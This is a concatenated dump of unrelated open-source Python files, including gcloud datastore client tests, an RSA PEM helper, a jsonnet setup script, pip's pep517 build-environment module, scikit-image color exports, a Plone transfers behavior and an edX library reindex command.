commit_req, transaction_id) = client.connection._commit_cw[0]
self.assertEqual(project, self.PROJECT)
mutated_entity = _mutated_pb(self, commit_req.mutations, 'insert')
self.assertEqual(mutated_entity.key, key.to_protobuf())
prop_list = list(_property_tuples(mutated_entity))
self.assertTrue(len(prop_list), 1)
name, value_pb = prop_list[0]
self.assertEqual(name, 'foo')
self.assertEqual(value_pb.string_value, u'bar')
self.assertTrue(transaction_id is None)
def test_put_multi_existing_batch_w_completed_key(self):
from gcloud.datastore.helpers import _property_tuples
from gcloud.datastore.test_batch import _Entity
from gcloud.datastore.test_batch import _Key
from gcloud.datastore.test_batch import _mutated_pb
creds = object()
client = self._makeOne(credentials=creds)
entity = _Entity(foo=u'bar')
key = entity.key = _Key(self.PROJECT)
with _NoCommitBatch(client) as CURR_BATCH:
result = client.put_multi([entity])
self.assertEqual(result, None)
mutated_entity = _mutated_pb(self, CURR_BATCH.mutations, 'upsert')
self.assertEqual(mutated_entity.key, key.to_protobuf())
prop_list = list(_property_tuples(mutated_entity))
self.assertTrue(len(prop_list), 1)
name, value_pb = prop_list[0]
self.assertEqual(name, 'foo')
self.assertEqual(value_pb.string_value, u'bar')
def test_delete(self):
_called_with = []
def _delete_multi(*args, **kw):
_called_with.append((args, kw))
creds = object()
client = self._makeOne(credentials=creds)
client.delete_multi = _delete_multi
key = object()
client.delete(key)
self.assertEqual(_called_with[0][0], ())
self.assertEqual(_called_with[0][1]['keys'], [key])
def test_delete_multi_no_keys(self):
creds = object()
client = self._makeOne(credentials=creds)
result = client.delete_multi([])
self.assertEqual(result, None)
self.assertEqual(len(client.connection._commit_cw), 0)
def test_delete_multi_no_batch(self):
from gcloud.datastore.test_batch import _Key
from gcloud.datastore.test_batch import _mutated_pb
key = _Key(self.PROJECT)
creds = object()
client = self._makeOne(credentials=creds)
client.connection._commit.append([])
result = client.delete_multi([key])
self.assertEqual(result, None)
self.assertEqual(len(client.connection._commit_cw), 1)
(project,
commit_req, transaction_id) = client.connection._commit_cw[0]
self.assertEqual(project, self.PROJECT)
mutated_key = _mutated_pb(self, commit_req.mutations, 'delete')
self.assertEqual(mutated_key, key.to_protobuf())
self.assertTrue(transaction_id is None)
def test_delete_multi_w_existing_batch(self):
from gcloud.datastore.test_batch import _Key
from gcloud.datastore.test_batch import _mutated_pb
creds = object()
client = self._makeOne(credentials=creds)
key = _Key(self.PROJECT)
with _NoCommitBatch(client) as CURR_BATCH:
result = client.delete_multi([key])
self.assertEqual(result, None)
mutated_key = _mutated_pb(self, CURR_BATCH.mutations, 'delete')
self.assertEqual(mutated_key, key._key)
self.assertEqual(len(client.connection._commit_cw), 0)
def test_delete_multi_w_existing_transaction(self):
from gcloud.datastore.test_batch import _Key
from gcloud.datastore.test_batch import _mutated_pb
creds = object()
client = self._makeOne(credentials=creds)
key = _Key(self.PROJECT)
with _NoCommitTransaction(client) as CURR_XACT:
result = client.delete_multi([key])
self.assertEqual(result, None)
mutated_key = _mutated_pb(self, CURR_XACT.mutations, 'delete')
self.assertEqual(mutated_key, key._key)
self.assertEqual(len(client.connection._commit_cw), 0)
def test_allocate_ids_w_partial_key(self):
from gcloud.datastore.test_batch import _Key
NUM_IDS = 2
INCOMPLETE_KEY = _Key(self.PROJECT)
INCOMPLETE_KEY._id = None
creds = object()
client = self._makeOne(credentials=creds)
result = client.allocate_ids(INCOMPLETE_KEY, NUM_IDS)
# Check the IDs returned.
self.assertEqual([key._id for key in result], list(range(NUM_IDS)))
def test_allocate_ids_with_completed_key(self):
from gcloud.datastore.test_batch import _Key
creds = object()
client = self._makeOne(credentials=creds)
COMPLETE_KEY = _Key(self.PROJECT)
self.assertRaises(ValueError, client.allocate_ids, COMPLETE_KEY, 2)
def test_key_w_project(self):
KIND = 'KIND'
ID = 1234
creds = object()
client = self._makeOne(credentials=creds)
self.assertRaises(TypeError,
client.key, KIND, ID, project=self.PROJECT)
def test_key_wo_project(self):
from gcloud.datastore import client as MUT
from gcloud._testing import _Monkey
KIND = 'KIND'
ID = 1234
creds = object()
client = self._makeOne(credentials=creds)
with _Monkey(MUT, Key=_Dummy):
key = client.key(KIND, ID)
self.assertTrue(isinstance(key, _Dummy))
self.assertEqual(key.args, (KIND, ID))
expected_kwargs = {
'project': self.PROJECT,
'namespace': None,
}
self.assertEqual(key.kwargs, expected_kwargs)
def test_key_w_namespace(self):
from gcloud.datastore import client as MUT
from gcloud._testing import _Monkey
KIND = 'KIND'
ID = 1234
NAMESPACE = object()
creds = object()
client = self._makeOne(namespace=NAMESPACE, credentials=creds)
with _Monkey(MUT, Key=_Dummy):
key = client.key(KIND, ID)
self.assertTrue(isinstance(key, _Dummy))
expected_kwargs = {
'project': self.PROJECT,
'namespace': NAMESPACE,
}
self.assertEqual(key.kwargs, expected_kwargs)
def test_key_w_namespace_collision(self):
from gcloud.datastore import client as MUT
from gcloud._testing import _Monkey
KIND = 'KIND'
ID = 1234
NAMESPACE1 = object()
NAMESPACE2 = object()
creds = object()
client = self._makeOne(namespace=NAMESPACE1, credentials=creds)
with _Monkey(MUT, Key=_Dummy):
key = client.key(KIND, ID, namespace=NAMESPACE2)
self.assertTrue(isinstance(key, _Dummy))
expected_kwargs = {
'project': self.PROJECT,
'namespace': NAMESPACE2,
}
self.assertEqual(key.kwargs, expected_kwargs)
def test_batch(self):
from gcloud.datastore import client as MUT
from gcloud._testing import _Monkey
creds = object()
client = self._makeOne(credentials=creds)
with _Monkey(MUT, Batch=_Dummy):
batch = client.batch()
self.assertTrue(isinstance(batch, _Dummy))
self.assertEqual(batch.args, (client,))
self.assertEqual(batch.kwargs, {})
def test_transaction_defaults(self):
from gcloud.datastore import client as MUT
from gcloud._testing import _Monkey
creds = object()
client = self._makeOne(credentials=creds)
with _Monkey(MUT, Transaction=_Dummy):
xact = client.transaction()
self.assertTrue(isinstance(xact, _Dummy))
self.assertEqual(xact.args, (client,))
self.assertEqual(xact.kwargs, {})
def test_query_w_client(self):
KIND = 'KIND'
creds = object()
client = self._makeOne(credentials=creds)
other = self._makeOne(credentials=object())
self.assertRaises(TypeError, client.query, kind=KIND, client=other)
def test_query_w_project(self):
KIND = 'KIND'
creds = object()
client = self._makeOne(credentials=creds)
self.assertRaises(TypeError,
client.query, kind=KIND, project=self.PROJECT)
def test_query_w_defaults(self):
from gcloud.datastore import client as MUT
from gcloud._testing import _Monkey
creds = object()
client = self._makeOne(credentials=creds)
with _Monkey(MUT, Query=_Dummy):
query = client.query()
self.assertTrue(isinstance(query, _Dummy))
self.assertEqual(query.args, (client,))
expected_kwargs = {
'project': self.PROJECT,
'namespace': None,
}
self.assertEqual(query.kwargs, expected_kwargs)
def test_query_explicit(self):
from gcloud.datastore import client as MUT
from gcloud._testing import _Monkey
KIND = 'KIND'
NAMESPACE = 'NAMESPACE'
ANCESTOR = object()
FILTERS = [('PROPERTY', '==', 'VALUE')]
PROJECTION = ['__key__']
ORDER = ['PROPERTY']
DISTINCT_ON = ['DISTINCT_ON']
creds = object()
client = self._makeOne(credentials=creds)
with _Monkey(MUT, Query=_Dummy):
query = client.query(
kind=KIND,
namespace=NAMESPACE,
ancestor=ANCESTOR,
filters=FILTERS,
projection=PROJECTION,
order=ORDER,
distinct_on=DISTINCT_ON,
)
self.assertTrue(isinstance(query, _Dummy))
self.assertEqual(query.args, (client,))
kwargs = {
'project': self.PROJECT,
'kind': KIND,
'namespace': NAMESPACE,
'ancestor': ANCESTOR,
'filters': FILTERS,
'projection': PROJECTION,
'order': ORDER,
'distinct_on': DISTINCT_ON,
}
self.assertEqual(query.kwargs, kwargs)
def test_query_w_namespace(self):
from gcloud.datastore import client as MUT
from gcloud._testing import _Monkey
KIND = 'KIND'
NAMESPACE = object()
creds = object()
client = self._makeOne(namespace=NAMESPACE, credentials=creds)
with _Monkey(MUT, Query=_Dummy):
query = client.query(kind=KIND)
self.assertTrue(isinstance(query, _Dummy))
self.assertEqual(query.args, (client,))
expected_kwargs = {
'project': self.PROJECT,
'namespace': NAMESPACE,
'kind': KIND,
}
self.assertEqual(query.kwargs, expected_kwargs)
def test_query_w_namespace_collision(self):
from gcloud.datastore import client as MUT
from gcloud._testing import _Monkey
KIND = 'KIND'
NAMESPACE1 = object()
NAMESPACE2 = object()
creds = object()
client = self._makeOne(namespace=NAMESPACE1, credentials=creds)
with _Monkey(MUT, Query=_Dummy):
query = client.query(kind=KIND, namespace=NAMESPACE2)
self.assertTrue(isinstance(query, _Dummy))
self.assertEqual(query.args, (client,))
expected_kwargs = {
'project': self.PROJECT,
'namespace': NAMESPACE2,
'kind': KIND,
}
self.assertEqual(query.kwargs, expected_kwargs)
class _Dummy(object):
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
class _MockConnection(object):
def __init__(self, credentials=None, http=None):
self.credentials = credentials
self.http = http
self._lookup_cw = []
self._lookup = []
self._commit_cw = []
self._commit = []
self._alloc_cw = []
self._alloc = []
self._index_updates = 0
def _add_lookup_result(self, results=(), missing=(), deferred=()):
self._lookup.append((list(results), list(missing), list(deferred)))
def lookup(self, project, key_pbs, eventual=False, transaction_id=None):
self._lookup_cw.append((project, key_pbs, eventual, transaction_id))
triple, self._lookup = self._lookup[0], self._lookup[1:]
results, missing, deferred = triple
return results, missing, deferred
def commit(self, project, commit_request, transaction_id):
self._commit_cw.append((project, commit_request, transaction_id))
response, self._commit = self._commit[0], self._commit[1:]
return self._index_updates, response
def allocate_ids(self, project, key_pbs):
from gcloud.datastore.test_connection import _KeyProto
self._alloc_cw.append((project, key_pbs))
num_pbs = len(key_pbs)
return [_KeyProto(i) for i in list(range(num_pbs))]
class _NoCommitBatch(object):
def __init__(self, client):
from gcloud.datastore.batch import Batch
self._client = client
self._batch = Batch(client)
def __enter__(self):
self._client._push_batch(self._batch)
return self._batch
def __exit__(self, *args):
self._client._pop_batch()
class _NoCommitTransaction(object):
def __init__(self, client, transaction_id='TRANSACTION'):
from gcloud.datastore.transaction import Transaction
self._client = client
xact = self._transaction = Transaction(client)
xact._id = transaction_id
def __enter__(self):
self._client._push_batch(self._transaction)
return self._transaction
def __exit__(self, *args):
self._client._pop_batch()
| mit |
rkokkelk/CouchPotatoServer | libs/rsa/pem.py | 216 | 3372 | # -*- coding: utf-8 -*-
#
# Copyright 2011 Sybren A. Stüvel <sybren@stuvel.eu>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Functions that load and write PEM-encoded files.'''
import base64
from rsa._compat import b, is_bytes
def _markers(pem_marker):
'''
Returns the start and end PEM markers
'''
if is_bytes(pem_marker):
pem_marker = pem_marker.decode('utf-8')
return (b('-----BEGIN %s-----' % pem_marker),
b('-----END %s-----' % pem_marker))
def load_pem(contents, pem_marker):
'''Loads a PEM file.
@param contents: the contents of the file to interpret
@param pem_marker: the marker of the PEM content, such as 'RSA PRIVATE KEY'
when your file has '-----BEGIN RSA PRIVATE KEY-----' and
'-----END RSA PRIVATE KEY-----' markers.
@return the base64-decoded content between the start and end markers.
@raise ValueError: when the content is invalid, for example when the start
marker cannot be found.
'''
(pem_start, pem_end) = _markers(pem_marker)
pem_lines = []
in_pem_part = False
for line in contents.splitlines():
line = line.strip()
# Skip empty lines
if not line:
continue
# Handle start marker
if line == pem_start:
if in_pem_part:
raise ValueError('Seen start marker "%s" twice' % pem_start)
in_pem_part = True
continue
# Skip stuff before first marker
if not in_pem_part:
continue
# Handle end marker
if in_pem_part and line == pem_end:
in_pem_part = False
break
# Load fields
if b(':') in line:
continue
pem_lines.append(line)
# Do some sanity checks
if not pem_lines:
raise ValueError('No PEM start marker "%s" found' % pem_start)
if in_pem_part:
raise ValueError('No PEM end marker "%s" found' % pem_end)
# Base64-decode the contents
pem = b('').join(pem_lines)
return base64.decodestring(pem)
def save_pem(contents, pem_marker):
'''Saves a PEM file.
@param contents: the contents to encode in PEM format
@param pem_marker: the marker of the PEM content, such as 'RSA PRIVATE KEY'
when your file has '-----BEGIN RSA PRIVATE KEY-----' and
'-----END RSA PRIVATE KEY-----' markers.
@return the base64-encoded content between the start and end markers.
'''
(pem_start, pem_end) = _markers(pem_marker)
b64 = base64.encodestring(contents).replace(b('\n'), b(''))
pem_lines = [pem_start]
for block_start in range(0, len(b64), 64):
block = b64[block_start:block_start + 64]
pem_lines.append(block)
pem_lines.append(pem_end)
pem_lines.append(b(''))
return b('\n').join(pem_lines)
| gpl-3.0 |
sebgoa/kubeless | vendor/github.com/google/go-jsonnet/cpp-jsonnet/setup.py | 3 | 2333 | # Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from setuptools import setup
from setuptools import Extension
from setuptools.command.build_ext import build_ext as BuildExt
from subprocess import Popen
DIR = os.path.abspath(os.path.dirname(__file__))
LIB_OBJECTS = [
'core/desugarer.o',
'core/formatter.o',
'core/libjsonnet.o',
'core/lexer.o',
'core/parser.o',
'core/pass.o',
'core/static_analysis.o',
'core/string_utils.o',
'core/vm.o',
'third_party/md5/md5.o'
]
MODULE_SOURCES = ['python/_jsonnet.c']
def get_version():
"""
Parses the version out of libjsonnet.h
"""
with open(os.path.join(DIR, 'include/libjsonnet.h')) as f:
for line in f:
if '#define' in line and 'LIB_JSONNET_VERSION' in line:
v_code = line.partition('LIB_JSONNET_VERSION')[2].strip('\n "')
if v_code[0] == "v":
v_code = v_code[1:]
return v_code
class BuildJsonnetExt(BuildExt):
def run(self):
p = Popen(['make'] + LIB_OBJECTS, cwd=DIR)
p.wait()
if p.returncode != 0:
raise Exception('Could not build %s' % (', '.join(LIB_OBJECTS)))
BuildExt.run(self)
jsonnet_ext = Extension(
'_jsonnet',
sources=MODULE_SOURCES,
extra_objects=LIB_OBJECTS,
include_dirs = ['include', 'third_party/md5'],
language='c++'
)
setup(name='jsonnet',
url='https://jsonnet.org',
description='Python bindings for Jsonnet - The data templating language ',
author='David Cunningham',
author_email='dcunnin@google.com',
version=get_version(),
cmdclass={
'build_ext': BuildJsonnetExt,
},
ext_modules=[jsonnet_ext],
test_suite="python._jsonnet_test",
)
| apache-2.0 |
jfinkels/networkx | examples/graph/atlas.py | 4 | 2761 | #!/usr/bin/env python
"""
Atlas of all graphs of 6 nodes or less.
"""
# Author: Aric Hagberg (hagberg@lanl.gov)
# Copyright (C) 2004-2016 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
# BSD license.
import networkx as nx
from networkx.generators.atlas import *
from networkx.algorithms.isomorphism.isomorph import graph_could_be_isomorphic as isomorphic
import random
def atlas6():
""" Return the atlas of all connected graphs of 6 nodes or less.
Attempt to check for isomorphisms and remove.
"""
Atlas = graph_atlas_g()[0:208] # 208
# remove isolated nodes, only connected graphs are left
U = nx.Graph() # graph for union of all graphs in atlas
for G in Atlas:
zerodegree = [n for n in G if G.degree(n)==0]
for n in zerodegree:
G.remove_node(n)
U = nx.disjoint_union(U, G)
# list of graphs of all connected components
C = nx.connected_component_subgraphs(U)
UU = nx.Graph()
# do quick isomorphic-like check, not a true isomorphism checker
nlist = [] # list of nonisomorphic graphs
for G in C:
# check against all nonisomorphic graphs so far
if not iso(G, nlist):
nlist.append(G)
UU = nx.disjoint_union(UU, G) # union the nonisomorphic graphs
return UU
def iso(G1, glist):
"""Quick and dirty nonisomorphism checker used to check isomorphisms."""
for G2 in glist:
if isomorphic(G1, G2):
return True
return False
if __name__ == '__main__':
G=atlas6()
print("graph has %d nodes with %d edges"\
%(nx.number_of_nodes(G), nx.number_of_edges(G)))
print(nx.number_connected_components(G), "connected components")
try:
import pygraphviz
from networkx.drawing.nx_agraph import graphviz_layout
except ImportError:
try:
import pydot
from networkx.drawing.nx_pydot import graphviz_layout
except ImportError:
raise ImportError("This example needs Graphviz and either "
"PyGraphviz or pydot")
import matplotlib.pyplot as plt
plt.figure(1, figsize=(8, 8))
# layout graphs with positions using graphviz neato
pos = graphviz_layout(G, prog="neato")
# color nodes the same in each connected subgraph
C = nx.connected_component_subgraphs(G)
for g in C:
c = [random.random()] * nx.number_of_nodes(g) # random color...
nx.draw(g,
pos,
node_size=40,
node_color=c,
vmin=0.0,
vmax=1.0,
with_labels=False
)
plt.savefig("atlas.png", dpi=75)
| bsd-3-clause |
kenxwagner/PythonPlay | Project/webscrap/websc/Lib/site-packages/pip/_vendor/pep517/envbuild.py | 10 | 6024 | """Build wheels/sdists by installing build deps to a temporary environment.
"""
import os
import logging
import toml
import shutil
from subprocess import check_call
import sys
from sysconfig import get_paths
from tempfile import mkdtemp
from .wrappers import Pep517HookCaller, LoggerWrapper
log = logging.getLogger(__name__)
def _load_pyproject(source_dir):
with open(os.path.join(source_dir, 'pyproject.toml')) as f:
pyproject_data = toml.load(f)
buildsys = pyproject_data['build-system']
return (
buildsys['requires'],
buildsys['build-backend'],
buildsys.get('backend-path'),
)
class BuildEnvironment(object):
"""Context manager to install build deps in a simple temporary environment
Based on code I wrote for pip, which is MIT licensed.
"""
# Copyright (c) 2008-2016 The pip developers (see AUTHORS.txt file)
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
path = None
def __init__(self, cleanup=True):
self._cleanup = cleanup
def __enter__(self):
self.path = mkdtemp(prefix='pep517-build-env-')
log.info('Temporary build environment: %s', self.path)
self.save_path = os.environ.get('PATH', None)
self.save_pythonpath = os.environ.get('PYTHONPATH', None)
install_scheme = 'nt' if (os.name == 'nt') else 'posix_prefix'
install_dirs = get_paths(install_scheme, vars={
'base': self.path,
'platbase': self.path,
})
scripts = install_dirs['scripts']
if self.save_path:
os.environ['PATH'] = scripts + os.pathsep + self.save_path
else:
os.environ['PATH'] = scripts + os.pathsep + os.defpath
if install_dirs['purelib'] == install_dirs['platlib']:
lib_dirs = install_dirs['purelib']
else:
lib_dirs = install_dirs['purelib'] + os.pathsep + \
install_dirs['platlib']
if self.save_pythonpath:
os.environ['PYTHONPATH'] = lib_dirs + os.pathsep + \
self.save_pythonpath
else:
os.environ['PYTHONPATH'] = lib_dirs
return self
def pip_install(self, reqs):
"""Install dependencies into this env by calling pip in a subprocess"""
if not reqs:
return
log.info('Calling pip to install %s', reqs)
cmd = [
sys.executable, '-m', 'pip', 'install', '--ignore-installed',
'--prefix', self.path] + list(reqs)
check_call(
cmd,
stdout=LoggerWrapper(log, logging.INFO),
stderr=LoggerWrapper(log, logging.ERROR),
)
    def __exit__(self, exc_type, exc_val, exc_tb):
        """Restore the original environment and optionally delete the prefix.

        Does not suppress exceptions (implicitly returns None).
        """
        needs_cleanup = (
            self._cleanup and
            self.path is not None and
            os.path.isdir(self.path)
        )
        if needs_cleanup:
            shutil.rmtree(self.path)
        # Restore PATH / PYTHONPATH to their pre-__enter__ state; a saved
        # value of None means the variable was originally unset.
        if self.save_path is None:
            os.environ.pop('PATH', None)
        else:
            os.environ['PATH'] = self.save_path
        if self.save_pythonpath is None:
            os.environ.pop('PYTHONPATH', None)
        else:
            os.environ['PYTHONPATH'] = self.save_pythonpath
def build_wheel(source_dir, wheel_dir, config_settings=None):
    """Build a wheel from a source directory using PEP 517 hooks.
    :param str source_dir: Source directory containing pyproject.toml
    :param str wheel_dir: Target directory to create wheel in
    :param dict config_settings: Options to pass to build backend
    :returns: the basename of the built wheel (whatever the backend's
        build_wheel hook returns)
    This is a blocking function which will run pip in a subprocess to install
    build requirements.
    """
    if config_settings is None:
        config_settings = {}
    requires, backend, backend_path = _load_pyproject(source_dir)
    hooks = Pep517HookCaller(source_dir, backend, backend_path)
    with BuildEnvironment() as env:
        # First the static build requirements from pyproject.toml, then any
        # dynamic requirements the backend reports for building a wheel.
        env.pip_install(requires)
        reqs = hooks.get_requires_for_build_wheel(config_settings)
        env.pip_install(reqs)
        return hooks.build_wheel(wheel_dir, config_settings)
def build_sdist(source_dir, sdist_dir, config_settings=None):
    """Build an sdist from a source directory using PEP 517 hooks.
    :param str source_dir: Source directory containing pyproject.toml
    :param str sdist_dir: Target directory to place sdist in
    :param dict config_settings: Options to pass to build backend
    :returns: the basename of the built sdist (whatever the backend's
        build_sdist hook returns)
    This is a blocking function which will run pip in a subprocess to install
    build requirements.
    """
    if config_settings is None:
        config_settings = {}
    requires, backend, backend_path = _load_pyproject(source_dir)
    hooks = Pep517HookCaller(source_dir, backend, backend_path)
    with BuildEnvironment() as env:
        # Static build requirements first, then the backend's dynamic
        # requirements for building an sdist.
        env.pip_install(requires)
        reqs = hooks.get_requires_for_build_sdist(config_settings)
        env.pip_install(reqs)
        return hooks.build_sdist(sdist_dir, config_settings)
| mit |
warmspringwinds/scikit-image | skimage/color/__init__.py | 28 | 3217 | from .colorconv import (convert_colorspace,
guess_spatial_dimensions,
rgb2hsv,
hsv2rgb,
rgb2xyz,
xyz2rgb,
rgb2rgbcie,
rgbcie2rgb,
rgb2grey,
rgb2gray,
gray2rgb,
xyz2lab,
lab2xyz,
lab2rgb,
rgb2lab,
xyz2luv,
luv2xyz,
luv2rgb,
rgb2luv,
rgb2hed,
hed2rgb,
lab2lch,
lch2lab,
separate_stains,
combine_stains,
rgb_from_hed,
hed_from_rgb,
rgb_from_hdx,
hdx_from_rgb,
rgb_from_fgx,
fgx_from_rgb,
rgb_from_bex,
bex_from_rgb,
rgb_from_rbd,
rbd_from_rgb,
rgb_from_gdx,
gdx_from_rgb,
rgb_from_hax,
hax_from_rgb,
rgb_from_bro,
bro_from_rgb,
rgb_from_bpx,
bpx_from_rgb,
rgb_from_ahx,
ahx_from_rgb,
rgb_from_hpx,
hpx_from_rgb)
from .colorlabel import color_dict, label2rgb
from .delta_e import (deltaE_cie76,
deltaE_ciede94,
deltaE_ciede2000,
deltaE_cmc,
)
__all__ = ['convert_colorspace',
'guess_spatial_dimensions',
'rgb2hsv',
'hsv2rgb',
'rgb2xyz',
'xyz2rgb',
'rgb2rgbcie',
'rgbcie2rgb',
'rgb2grey',
'rgb2gray',
'gray2rgb',
'xyz2lab',
'lab2xyz',
'lab2rgb',
'rgb2lab',
'rgb2hed',
'hed2rgb',
'lab2lch',
'lch2lab',
'separate_stains',
'combine_stains',
'rgb_from_hed',
'hed_from_rgb',
'rgb_from_hdx',
'hdx_from_rgb',
'rgb_from_fgx',
'fgx_from_rgb',
'rgb_from_bex',
'bex_from_rgb',
'rgb_from_rbd',
'rbd_from_rgb',
'rgb_from_gdx',
'gdx_from_rgb',
'rgb_from_hax',
'hax_from_rgb',
'rgb_from_bro',
'bro_from_rgb',
'rgb_from_bpx',
'bpx_from_rgb',
'rgb_from_ahx',
'ahx_from_rgb',
'rgb_from_hpx',
'hpx_from_rgb',
'color_dict',
'label2rgb',
'deltaE_cie76',
'deltaE_ciede94',
'deltaE_ciede2000',
'deltaE_cmc',
]
| bsd-3-clause |
OpenBfS/dokpool-plone | Plone/src/docpool.transfers/docpool/transfers/behaviors/transferstype.py | 1 | 3406 | # -*- coding: utf-8 -*-
#
# File: transferstype.py
#
# Copyright (c) 2016 by Bundesamt für Strahlenschutz
# Generator: ConPD2
# http://www.condat.de
#
__author__ = ''
__docformat__ = 'plaintext'
"""Definition of the TransfersType content type. See transferstype.py for more
explanation on the statements below.
"""
from Acquisition import aq_inner
from docpool.transfers import DocpoolMessageFactory as _
from docpool.transfers.db.query import allowed_targets
from plone.autoform.directives import widget
from plone.autoform.interfaces import IFormFieldProvider
from plone.supermodel import model
from Products.CMFPlone.utils import safe_unicode
from z3c.form.browser.checkbox import CheckBoxFieldWidget
from zope import schema
from zope.interface import provider
from zope.schema.interfaces import IContextSourceBinder
from zope.schema.vocabulary import SimpleTerm
from zope.schema.vocabulary import SimpleVocabulary
@provider(IContextSourceBinder)
def possible_targets_vocabulary_factory(dto):
    """Build a vocabulary of the transfer targets allowed for ``dto``.

    Each term uses the target id as both value and token, and the target's
    unicode representation as its title.
    """
    targets = allowed_targets(dto)
    return SimpleVocabulary([
        SimpleTerm(t.id, t.id, safe_unicode(t)) for t in targets])
@provider(IFormFieldProvider)
class ITransfersType(model.Schema):
    """Schema for transfer-related settings on a document type."""
    # Whether documents of this type may be sent to other ESDs at all.
    allowTransfer = schema.Bool(
        title=_(
            u'label_doctype_allowtransfer',
            default=u'Can documents of this type be sent to other ESDs?',
        ),
        description=_(u'description_doctype_allowtransfer', default=u''),
        required=False,
        default=True,
    )
    widget(automaticTransferTargets=CheckBoxFieldWidget)
    # Targets to which documents of this type are transferred automatically.
    # Choices come from possible_targets_vocabulary_factory (context-bound).
    automaticTransferTargets = schema.List(
        title=_(
            u'label_doctype_automatictransfertargets',
            default=u'Where are documents of this type transfered automatically?',
        ),
        description=_(
            u'description_doctype_automatictransfertargets', default=u''),
        required=False,
        value_type=schema.Choice(
            title=_(u'Transfer target'),
            source=possible_targets_vocabulary_factory,
        ),
    )
class TransfersType(object):
    """Behavior adapter storing transfer settings on the adapted context.
    """
    def __init__(self, context):
        self.context = context
    @property
    def allowTransfer(self):
        # Default to True when the attribute has never been set on the context.
        return getattr(self.context, "allowTransfer", True)
    @allowTransfer.setter
    def allowTransfer(self, value):
        context = aq_inner(self.context)
        context.allowTransfer = value
    @property
    def automaticTransferTargets(self):
        value = set(getattr(self.context, 'automaticTransferTargets', ()))
        if not value:
            # avoid unnecessary interaction with the zope.sqlalchemy datamanager
            return []
        # Only report targets that are currently allowed, sorted by title.
        allowed = {target.id: target for target in allowed_targets(self.context)}
        return sorted(
            value.intersection(allowed),
            key=lambda tid: safe_unicode(allowed[tid])
        )
    @automaticTransferTargets.setter
    def automaticTransferTargets(self, value):
        try:
            self.context.myDocumentPool()
        except AttributeError:
            # Context is not part of a document pool; nothing to store.
            return
        context = aq_inner(self.context)
        # Preserve previously stored targets that are no longer "allowed"
        # (and hence not editable through the form) instead of dropping them.
        unaffected = set(getattr(context, 'automaticTransferTargets', ()))
        if unaffected:
            allowed = (target.id for target in allowed_targets(context))
            unaffected.difference_update(allowed)
        context.automaticTransferTargets = tuple(unaffected.union(value))
| gpl-3.0 |
naresh21/synergetics-edx-platform | cms/djangoapps/contentstore/management/commands/reindex_library.py | 155 | 2604 | """ Management command to update libraries' search index """
from django.core.management import BaseCommand, CommandError
from optparse import make_option
from textwrap import dedent
from contentstore.courseware_index import LibrarySearchIndexer
from opaque_keys.edx.keys import CourseKey
from opaque_keys import InvalidKeyError
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from opaque_keys.edx.locator import LibraryLocator
from .prompt import query_yes_no
from xmodule.modulestore.django import modulestore
class Command(BaseCommand):
    """
    Command to reindex content libraries (single, multiple or all available)
    Examples:
    ./manage.py reindex_library lib1 lib2 - reindexes libraries with keys lib1 and lib2
    ./manage.py reindex_library --all - reindexes all available libraries
    """
    # NOTE: the class docstring doubles as the command's --help text via
    # `help = dedent(__doc__)` below; keep the two in sync when editing.
    help = dedent(__doc__)
    can_import_settings = True
    args = "<library_id library_id ...>"
    # optparse-style options (pre-argparse Django management command API).
    option_list = BaseCommand.option_list + (
        make_option(
            '--all',
            action='store_true',
            dest='all',
            default=False,
            help='Reindex all libraries'
        ),)
    CONFIRMATION_PROMPT = u"Reindexing all libraries might be a time consuming operation. Do you want to continue?"
    def _parse_library_key(self, raw_value):
        """ Parses library key from string """
        try:
            result = CourseKey.from_string(raw_value)
        except InvalidKeyError:
            # Fall back to the deprecated slash-separated key format.
            result = SlashSeparatedCourseKey.from_deprecated_string(raw_value)
        if not isinstance(result, LibraryLocator):
            raise CommandError(u"Argument {0} is not a library key".format(raw_value))
        return result
    def handle(self, *args, **options):
        """
        By convention set by django developers, this method actually executes command's actions.
        So, there could be no better docstring than emphasize this once again.
        """
        if len(args) == 0 and not options.get('all', False):
            raise CommandError(u"reindex_library requires one or more arguments: <library_id>")
        store = modulestore()
        if options.get('all', False):
            # Reindexing everything is expensive; ask before proceeding.
            if query_yes_no(self.CONFIRMATION_PROMPT, default="no"):
                library_keys = [library.location.library_key.replace(branch=None) for library in store.get_libraries()]
            else:
                return
        else:
            library_keys = map(self._parse_library_key, args)
        for library_key in library_keys:
            LibrarySearchIndexer.do_library_reindex(store, library_key)
| agpl-3.0 |
theblacklion/pyglet | pyglet/media/drivers/silent.py | 33 | 7717 | #!/usr/bin/env python
'''
'''
